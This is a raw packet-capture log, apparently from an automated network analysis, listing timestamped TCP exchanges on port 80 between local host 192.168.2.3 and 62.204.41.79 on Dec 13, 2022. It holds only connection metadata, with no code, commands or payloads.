                                              Dec 13, 2022 20:09:14.801630020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.801757097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.801886082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.802103043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.802206993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.802367926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.802625895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.802687883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.802850962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.802923918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.803083897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.803092003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.803250074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.803333044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.803473949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.803575039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.803683043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.808355093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.808588982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.810228109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.810338974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.810472965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.810659885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.810722113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.810801029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.810925961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.811093092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.811216116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.811590910 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.811615944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.811630011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.811744928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.811760902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.811794996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.811877966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.811968088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.811995983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.812107086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.812119007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.812231064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.812330008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.812433004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.812529087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.812632084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.812972069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.813112020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.813225031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.813518047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.813616991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.813724995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.813838959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.813954115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.814055920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.814179897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.814285994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.814404011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.814505100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.814618111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.814718962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.814830065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.814934969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815051079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815155029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815277100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815383911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815500021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815598965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815707922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815807104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815891027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.815920115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.815921068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.816071033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.816205978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.816245079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.816437006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.816565990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.816682100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.816844940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.816920042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.817043066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.817156076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.819523096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.819717884 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.819863081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.819992065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.820131063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.820255995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.820416927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.820535898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.820672989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.820800066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.820930004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.821053028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.821185112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.821309090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.821446896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.821573973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.821703911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.821819067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.821944952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.822072983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.822210073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.822371006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.822479010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.822614908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.822745085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.822894096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.823014021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.823158026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.823288918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.823431015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.823561907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.823709965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.823843002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.823992968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.824024916 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.824048042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.824059963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.824105978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.824196100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.824285984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.824357986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.824511051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.824664116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.836035013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.836102962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.836195946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.836282015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.836371899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.836460114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.836630106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.836793900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.836963892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.837116003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.837272882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.837408066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.861108065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.861155033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.861274004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.861336946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.861466885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.861706972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.861725092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.861857891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.861927986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.862097979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.862298965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.862318039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.863571882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.863830090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.863986969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.864016056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.864135981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.872462988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.872489929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.872504950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.872565031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.872704983 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.872720957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.872862101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.872973919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.873095036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.873459101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.873537064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.873656034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.873981953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.874053955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.874149084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.874316931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.874368906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.874512911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.874631882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.874699116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.874948978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.874963999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.875060081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.875175953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.875298023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.875366926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.875535011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.875566006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.875777960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.875821114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.875895023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.876018047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.876176119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.876223087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.876338959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.880145073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.880223036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.880511999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.880585909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.880701065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.880943060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.880990982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.881057978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.881269932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.881458998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.881592989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.881623983 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.881779909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.881941080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.882021904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.882225037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.882261038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.882380962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.882667065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.882740974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.882869005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.882941008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.883018970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.883205891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.883323908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.883558035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.883582115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.883783102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.883857965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.884143114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.884176970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.884588003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.884741068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.884778023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.884862900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.885023117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.885205984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.886514902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.886750937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.886908054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.887049913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.887227058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.887289047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.887406111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.887558937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.887624979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.887751102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.887880087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.888056040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.888205051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.888387918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.888525963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.888717890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.888871908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.889071941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.889214039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.889451981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.889507055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.889616966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.889740944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.889858007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.889986992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.890115976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.890266895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.890367985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.890496969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.890641928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.890757084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.890894890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.891017914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.896817923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.896878958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.896893978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.896908045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.897104979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.897269964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.897427082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.897633076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.897746086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.897862911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.942718029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.942858934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.943017006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.943114042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.943243027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.943372011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.943507910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.943629026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.943770885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.943897009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.944032907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.944164038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.944295883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.944601059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.944797039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.944950104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.945092916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.945260048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.945400000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.945535898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.947129011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.947221041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.947452068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.947550058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.947772980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.947789907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.947804928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.948142052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.948160887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.948178053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.948283911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.948530912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.948643923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.948805094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.949003935 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.949166059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.949331045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.949569941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.949640036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.949886084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.949901104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.950212955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.950228930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.950268030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.950463057 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.950541973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.951050997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.951215982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.951244116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.951257944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.951272011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.951360941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.951476097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.973974943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.974139929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.974281073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.974432945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.974603891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.974745035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.974896908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.975023985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.975174904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.975306034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.975450993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.975589037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.975897074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.976026058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.976176023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.976303101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.976443052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.976577997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.976728916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.976869106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.977016926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.977159977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.977304935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.977459908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.977591038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.977741003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.977876902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.978029966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.978172064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.978322983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.978476048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.978602886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.978777885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.978893995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.979027987 CET4973680192.168.2.362.204.41.79
